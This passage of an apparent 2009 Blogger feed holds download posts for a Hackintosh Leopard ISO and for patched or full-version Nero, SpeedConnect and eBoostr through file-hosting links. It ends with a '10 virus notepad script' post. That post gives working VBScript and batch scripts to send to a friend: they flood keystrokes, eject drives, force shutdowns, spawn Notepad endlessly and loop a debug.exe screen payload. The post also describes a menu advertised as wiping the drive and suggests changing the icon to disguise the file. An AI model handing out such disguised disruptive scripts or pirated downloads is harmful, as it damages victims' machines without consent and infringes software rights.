/&gt;AppleAPIC&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Others PATCHES&lt;/span&gt;&lt;br /&gt;cpus=1 flag&lt;br /&gt;Francais_pc_keyboard_layout&lt;br /&gt;TimeMachineFix&lt;br /&gt;PowerManagement_bundle (don't install it if you have select sse2 patch !!!)&lt;br /&gt;PowerManagement_bundle (don't install it if you have select sse2 patch !!!)&lt;br /&gt;IntelMemoryController&lt;br /&gt;AMD_1052_Patches (select patch 1 or patch 2)&lt;br /&gt;AMD_1052_Patch_test_1&lt;br /&gt;AMD_1052_Patch_test_2&lt;br /&gt;q-legacy flag&lt;br /&gt;&lt;br /&gt;Enjoy ^^&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Download:&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;a href="http://download.macwind.com/MacWind.com_Kalyway_10.5.2_DVD_Intel_Amd.iso"&gt;Mac OS X &lt;/a&gt;&lt;/span&gt;&lt;a href="http://download.macwind.com/MacWind.com_Kalyway_10.5.2_DVD_Intel_Amd.iso"&gt;Kalyway Leopard 10.5.2 DVD Intel Amd&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-8923305248823032210?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/8923305248823032210/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=8923305248823032210' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/8923305248823032210'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/8923305248823032210'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/kalyway-leopard-1052-dvd-intel.html' title='Mac OS X Kalyway Leopard 10.5.2 DVD Intel Amd.4122511 HTTP Download'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nUlVy6CeF-o/SdoShzvZ2_I/AAAAAAAAANA/qry-UGRQRbw/s72-c/MC094.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-5678655079167130358</id><published>2009-04-01T22:35:00.000-07:00</published><updated>2009-04-01T22:42:10.534-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Nero 9 - Lite Edition - Only 51MB!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdRPmr_tK9I/AAAAAAAAALA/2NfQTjw9eSM/s1600-h/35i15d2.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 273px; height: 320px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdRPmr_tK9I/AAAAAAAAALA/2NfQTjw9eSM/s400/35i15d2.jpg" alt="" id="BLOGGER_PHOTO_ID_5319964585894947794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nUlVy6CeF-o/SdRPmQoLA_I/AAAAAAAAAK4/RBa74yw6Utw/s1600-h/34kfb.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 284px;" src="http://3.bp.blogspot.com/_nUlVy6CeF-o/SdRPmQoLA_I/AAAAAAAAAK4/RBa74yw6Utw/s400/34kfb.png" alt="" id="BLOGGER_PHOTO_ID_5319964578548483058" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Nero 9 is the next generation of the world  most trusted integrated digital media and home entertainment software suite. It features new cutting-edge functionality that makes enjoying digital media content simple.&lt;br /&gt;&lt;br /&gt;This easy-to-use yet powerful multimedia suite, gives you the freedom to create, rip, copy, burn, edit, share, and upload online. Whatever you want  music, video, photo, and data  enjoy and share with family and friends anytime, anywhere.&lt;br /&gt;&lt;br /&gt;With easy-to-use Nero StartSmart command center, your digital life has never been more flexible, feasible, and fun.&lt;br /&gt;&lt;br /&gt;Highlights:&lt;br /&gt;- Fast and easy rip, burn, Autobackup, and copy functions&lt;br /&gt;- Backup files to CDs, DVDs, and Blu-ray Discs*&lt;br /&gt;- Create professional-looking DVD movies with integrated 3D menus&lt;br /&gt;- Copy, burn, share, upload, and create music mixes like a DJ&lt;br /&gt;- Convert music, photos, and DVDs to play on your iPodÂ® and other mobile devices&lt;br /&gt;- Quick photo and video upload to My Nero, YouTubeâ„¢, and MySpace&lt;br /&gt;- Watch, record, pause, and customize your live TV experience&lt;br /&gt;- Play AVCHD and other HD formats&lt;br /&gt;&lt;br /&gt;Included Features:&lt;br /&gt;- Nero Burning ROM&lt;br /&gt;- Nero Express&lt;br /&gt;- Nero DiscSpeed&lt;br /&gt;- Nero DriveSpeed&lt;br /&gt;- Nero InfoTool&lt;br /&gt;- Nero RescueAgent&lt;br /&gt;- ControlCenter&lt;br /&gt;&lt;br /&gt;IMPORTANT: Uninstall older Nero version before installing Nero 9 Lite.&lt;span style="font-family:monospace;"&gt;&lt;br /&gt;&lt;/span&gt;Enjoy ^^&lt;br /&gt;&lt;br /&gt;Rapidshare:&lt;br /&gt;&lt;a href="http://rapidshare.com/files/197976713/Nero_9_Lite.rar"&gt;http://rapidshare.com/files/197976713/Nero_9_Lite.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Megaupload:&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=9897RBRQ"&gt;http://www.megaupload.com/?d=9897RBRQ&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-5678655079167130358?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/5678655079167130358/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=5678655079167130358' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/5678655079167130358'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/5678655079167130358'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/nero-9-lite-edition-only-51mb.html' title='Nero 9 - Lite Edition - Only 51MB!'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SdRPmr_tK9I/AAAAAAAAALA/2NfQTjw9eSM/s72-c/35i15d2.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-2943252699719344024</id><published>2009-04-01T21:43:00.000-07:00</published><updated>2009-04-01T22:01:32.338-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>Full version SpeedConnect Internet Accelerator v.7.5 2009</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/SdRCufvlixI/AAAAAAAAAKo/1dqhoKKZMp0/s1600-h/speedconnect.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 200px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/SdRCufvlixI/AAAAAAAAAKo/1dqhoKKZMp0/s400/speedconnect.jpg" alt="" id="BLOGGER_PHOTO_ID_5319950426393905938" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Top internet accelerator (according to PC Magazine), a network settings optimizer to speed up your existing Dial-Up Modem, DSL, Cable, Wireless, LAN, High-speed internet connections.&lt;br /&gt;&lt;br /&gt;SpeedConnect Internet Accelerator is a powerful Windows application designed to optimize your network connection and speed up all your internet activities. This translates into a faster internet connection, faster browsing and email, faster downloads, faster online gaming, improved Skype connection.&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdRCuc9G03I/AAAAAAAAAKw/tvqeRQSQfWI/s1600-h/speedconnect3.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 290px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdRCuc9G03I/AAAAAAAAAKw/tvqeRQSQfWI/s400/speedconnect3.gif" alt="" id="BLOGGER_PHOTO_ID_5319950425645306738" border="0" /&gt;&lt;/a&gt;SpeedConnect prevents fragmentation in data transfer using the TCP/IP protocols used on the Internet, greatly increasing the connection throughput and the download/upload speeds (Kbps).&lt;br /&gt;&lt;br /&gt;Because Windows default network settings have general values and are not optimized for a specific internet connection type, SpeedConnect software calculates, optimize and safely change several network related settings to known optimized values, in a recursive process, until it discovers the best settings for your specific connection. Basically, SpeedConnect applies optimized network settings values which will prevent the data packets fragmentation and will speed up your connection. All this translates into faster web browsing, faster e-mail, faster downloads and improved overall Internet performance.&lt;br /&gt;SPEED OPTIMIZATION&lt;br /&gt;SpeedConnect Internet Accelerator is designed to optimize the network tcp/ip settings and speed up all your internet related activities including browsing, downloading, uploading, streaming, online gaming, sending and receiving email. SpeedConnect Quick Optimizer mode provides the fastest way to speed up your connection. Experienced users get total control in advanced mode, which provides manual access to all settings.&lt;br /&gt;BENEFITS&lt;br /&gt;FASTER internet connection&lt;br /&gt;Browse FASTER&lt;br /&gt;Send and receive e-mail FASTER&lt;br /&gt;Download and upload files FASTER&lt;br /&gt;Play online games FASTER&lt;br /&gt;Improve Skype connection&lt;br /&gt;NO adware, NO hardware installation&lt;br /&gt;NO service subscription, NO monthly fees&lt;br /&gt;NO new hardware installation&lt;br /&gt;FEATURES&lt;br /&gt;Optimizes all internet connection types&lt;br /&gt;User friendly&lt;br /&gt;Quick Optimizer option&lt;br /&gt;Advanced Customization&lt;br /&gt;Tool and Wizards&lt;br /&gt;Load/Save Settings&lt;br /&gt;Optimization Report&lt;br /&gt;Connection Analyzer       &lt;br /&gt;&lt;br /&gt;Rapidshare:&lt;span style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href="http://rapidshare.com/files/204894970/speed_connect_v7.5.rar"&gt;http://rapidshare.com/files/204894970/speed_connect_v7.5.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Megaupload:&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=JWAKWPKH"&gt;http://www.megaupload.com/?d=JWAKWPKH&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-2943252699719344024?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/2943252699719344024/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=2943252699719344024' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2943252699719344024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/2943252699719344024'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/04/full-version-speedconnect-internet.html' title='Full version SpeedConnect Internet Accelerator v.7.5 2009'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_nUlVy6CeF-o/SdRCufvlixI/AAAAAAAAAKo/1dqhoKKZMp0/s72-c/speedconnect.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-900625292000516443</id><published>2009-03-30T06:12:00.000-07:00</published><updated>2009-03-31T04:31:26.801-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software'/><title type='text'>eBoostr:Boost Your Windows with Flash Memory</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdDIlOV_KqI/AAAAAAAAAKA/aMYpuhCOw2E/s1600-h/faster-than-ever.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 69px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdDIlOV_KqI/AAAAAAAAAKA/aMYpuhCOw2E/s400/faster-than-ever.gif" alt="" id="BLOGGER_PHOTO_ID_5318971701755587234" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdDKGIhjGVI/AAAAAAAAAKI/_odZjCMslNY/s1600-h/desc-trans.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 169px; height: 186px;" src="http://2.bp.blogspot.com/_nUlVy6CeF-o/SdDKGIhjGVI/AAAAAAAAAKI/_odZjCMslNY/s400/desc-trans.png" alt="" id="BLOGGER_PHOTO_ID_5318973366640777554" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nUlVy6CeF-o/SdDKolxMgXI/AAAAAAAAAKQ/c3ETWGY1JmM/s1600-h/eBoostr-18561.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 302px;" src="http://1.bp.blogspot.com/_nUlVy6CeF-o/SdDKolxMgXI/AAAAAAAAAKQ/c3ETWGY1JmM/s400/eBoostr-18561.png" alt="" id="BLOGGER_PHOTO_ID_5318973958606586226" border="0" /&gt;&lt;/a&gt;&lt;h1&gt;PC Getting Slow&lt;/h1&gt;&lt;h1&gt;Give Your Windows PC a Boost!&lt;/h1&gt; &lt;h2 style="font-weight: bold; font-family: times new roman;font-family:times new roman;" &gt;&lt;span style="font-size:100%;"&gt;&lt;strong&gt;eBoostr&lt;/strong&gt;, working as an alternative solution to &lt;strong&gt;ReadyBoost&lt;/strong&gt; and &lt;strong&gt;SuperFetch&lt;/strong&gt; technologies, implements a different advanced approach to use flash memory to speed up your computer&lt;/span&gt;&lt;/h2&gt; &lt;p&gt;It speeds up your PC and improves application responsiveness by using flash memory and free RAM as an extra layer of performance-boosting cache for your PC. Use up to four inexpensive flash devices to speed up your system. Add more speed to your PC without any hardware upgrade!&lt;/p&gt;&lt;h3 class="top_margin"&gt;Highlights&lt;/h3&gt; &lt;ul&gt;&lt;li&gt;Vista’s ReadyBoost and SuperFetch benefits on your Windows XP PCs;&lt;/li&gt;&lt;li&gt;Smart caching of frequently used applications and files for maximum performance;&lt;/li&gt;&lt;li&gt;Supports both USB and non-USB removable media devices (CF, SD/SDHC, MMC, xD and other memory cards), as well as additional hard disks;&lt;/li&gt;&lt;li&gt;Allows up to 4 devices for simultaneous smart caching;&lt;/li&gt;&lt;li&gt;Cache file size of up to 4GB on each device (NTFS has no limit on the size);&lt;/li&gt;&lt;li&gt;Compatible with all “Enhanced for ReadyBoost” devices.&lt;/li&gt;&lt;/ul&gt;&lt;div class="column second"&gt; &lt;h3 class="colored"&gt;System Requirements&lt;/h3&gt; &lt;ul&gt;&lt;li&gt;&lt;strong&gt;Windows Vista&lt;/strong&gt;, &lt;strong&gt;Windows XP&lt;/strong&gt;, &lt;strong&gt;Windows 2000&lt;/strong&gt;&lt;sup&gt;*&lt;/sup&gt;, &lt;strong&gt;Windows 2003 Server&lt;/strong&gt;,  &lt;strong&gt;Windows 2008 Server&lt;/strong&gt;, &lt;strong&gt;Windows 7 Beta&lt;/strong&gt;&lt;br /&gt;(all 32 and 64 bit systems supported)&lt;/li&gt;&lt;li&gt;&lt;strong&gt;USB 2.0&lt;/strong&gt; port version or memory card reader&lt;/li&gt;&lt;li&gt;Flash drive or memory card with at least 2.5 MB/sec random read speed&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Windows 2000 Service Pack 4 and Update Rollup 1 for sp4  are required&lt;/li&gt;&lt;/ul&gt;  &lt;/div&gt; &lt;h3 class="colored"&gt;eBoostr Installation File&lt;/h3&gt; &lt;ul&gt;&lt;li&gt;Version: &lt;strong&gt;3.0 build 491&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;Filesize: &lt;strong&gt;5.8MB with pactch&lt;br /&gt;&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;Release Date: &lt;strong&gt;January 28th, 2009&lt;/strong&gt;&lt;/li&gt;&lt;li style="text-align: left;"&gt;Available in 39 language &lt;a href="http://www.eboostr.com/download/#lang"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-weight: bold;"&gt;Download:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=XZT8EUC9"&gt;http://www.megaupload.com/?d=XZT8EUC9&lt;br /&gt;&lt;/a&gt;&lt;div style="text-align: left;"&gt;Enjoy^^&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-900625292000516443?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/900625292000516443/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=900625292000516443' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/900625292000516443'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/900625292000516443'/><link rel='alternate' type='text/html' href='http://myhistoryweb.blogspot.com/2009/03/eboostrboost-your-windows-with-flash.html' title='eBoostr:Boost Your Windows with Flash Memory'/><author><name>isaacz</name><uri>http://www.blogger.com/profile/06852367671608479880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_nUlVy6CeF-o/SdDIlOV_KqI/AAAAAAAAAKA/aMYpuhCOw2E/s72-c/faster-than-ever.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8242227210141674342.post-6477949435595249456</id><published>2009-03-26T02:04:00.000-07:00</published><updated>2009-04-03T05:48:00.612-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tricks'/><title type='text'>10 virus notepad script</title><content type='html'>All this comand use to type in notepad&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!&lt;/span&gt;&lt;br /&gt;Type :&lt;br /&gt;&lt;br /&gt;Set oWMP = CreateObject("WMPlayer.OCX.7")&lt;br /&gt;Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;do&lt;br /&gt;if colCDROMs.Count &gt;= 1 then&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next&lt;br /&gt;End If&lt;br /&gt;wscript.sleep 5000&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;Save it as "Anything.VBS" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2) Toggle your friend's Caps Lock button simultaneously:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Set wshShell =wscript.CreateObject("WScript.Shell")&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys "{CAPSLOCK}"&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;Save it as "Anything.VBS" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3)  Convey your friend a lil' message and shut down his / her computer:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;msg * I don't like you&lt;br /&gt;shutdown -c "Error! You are too stupid!" -s&lt;br /&gt;&lt;br /&gt;Save it as "Anything.BAT" in All Files and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4) Frustrate your friend by making this VBScript hit Enter simultaneously:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Set wshShell = wscript.CreateObject("WScript.Shell")&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys "~(enter)"&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;Save it as "Anything.VBS" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;WScript.Sleep 180000&lt;br /&gt;WScript.Sleep 10000&lt;br /&gt;Set WshShell = WScript.CreateObject("WScript.Shell")&lt;br /&gt;WshShell.Run "notepad"&lt;br /&gt;WScript.Sleep 100&lt;br /&gt;WshShell.AppActivate "Notepad"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "Hel"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "lo "&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys ", ho"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "w a"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "re "&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "you"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "? "&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "I a"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "m g"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "ood"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys " th"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "ank"&lt;br /&gt;WScript.Sleep 500&lt;br /&gt;WshShell.SendKeys "s! "&lt;br /&gt;&lt;br /&gt;Save it as "Anything.VBS" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;6) Frustrate your friend by making this VBScript hit Backspace simultaneously:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;MsgBox "Let's go back a few steps"&lt;br /&gt;Set wshShell =wscript.CreateObject("WScript.Shell")&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys "{bs}"&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;Save it as "Anything.VBS" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Set wshShell = wscript.CreateObject("WScript.Shell")&lt;br /&gt;do&lt;br /&gt;wscript.sleep 100&lt;br /&gt;wshshell.sendkeys "You are a fool."&lt;br /&gt;loop&lt;br /&gt;&lt;br /&gt;Save it as "Anything.VBS" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;8. Open Notepad continually in your friend's computer:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Type :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;@ECHO off&lt;br /&gt;:top&lt;br /&gt;START %SystemRoot%\system32\notepad.exe&lt;br /&gt;GOTO top&lt;br /&gt;&lt;br /&gt;Save it as "Anything.BAT" and send it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1: Shutdown&lt;br /&gt;2: Restart&lt;br /&gt;3: Wipes out your hard drive (BEWARE)&lt;br /&gt;4: Net send&lt;br /&gt;5: Messages then shutdown&lt;br /&gt;Type :&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;title The end of the world&lt;br /&gt;cd C:\&lt;br /&gt;:menu&lt;br /&gt;cls&lt;br /&gt;echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...&lt;br /&gt;pause&lt;br /&gt;echo Pick your poison:&lt;br /&gt;echo 1. Die this way (Wimp)&lt;br /&gt;echo 2. Die this way (WIMP!)&lt;br /&gt;echo 3. DO NOT DIE THIS WAY&lt;br /&gt;echo 4. Die this way (you're boring)&lt;br /&gt;echo 5. Easy way out&lt;br /&gt;set input=nothing&lt;br /&gt;set /p input=Choice:&lt;br /&gt;if %input%==1 goto one&lt;br /&gt;if %input%==2 goto two&lt;br /&gt;&lt;br /&gt;Save it as "Anything.BAT" and send it.&lt;br /&gt;&lt;br /&gt;You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;10) THRETEN BY MAKING SCREEN FLASH&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30&gt;\z.dbg&lt;br /&gt;echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75&gt;&gt;\z.dbg&lt;br /&gt;echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88&gt;&gt;\z.dbg&lt;br /&gt;echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3&gt;&gt;\z.dbg&lt;br /&gt;echo g=100&gt;&gt;\z.dbg&lt;br /&gt;echo q&gt;&gt;\z.dbg&lt;br /&gt;debug &lt;\z.dbg&gt;nul&lt;br /&gt;del \z.dbg&lt;br /&gt;But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.&lt;br /&gt;@echo off&lt;br /&gt;:a&lt;br /&gt;echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30&gt;\z.dbg&lt;br /&gt;echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75&gt;&gt;\z.dbg&lt;br /&gt;echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88&gt;&gt;\z.dbg&lt;br /&gt;echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3&gt;&gt;\z.dbg&lt;br /&gt;echo g=100&gt;&gt;\z.dbg&lt;br /&gt;echo q&gt;&gt;\z.dbg&lt;br /&gt;debug &lt;\z.dbg&gt;nul&lt;br /&gt;del \z.dbg&lt;br /&gt;goto a&lt;br /&gt;&lt;br /&gt;To disable error (ctrl+shirt+esc) then end process wscript.exe&lt;br /&gt;Enjoy!!!^^&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8242227210141674342-6477949435595249456?l=myhistoryweb.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://myhistoryweb.blogspot.com/feeds/6477949435595249456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8242227210141674342&amp;postID=6477949435595249456' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6477949435595249456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8242227210141674342/posts/default/6477949435595249456'/><link rel='alternate' type='text/html' 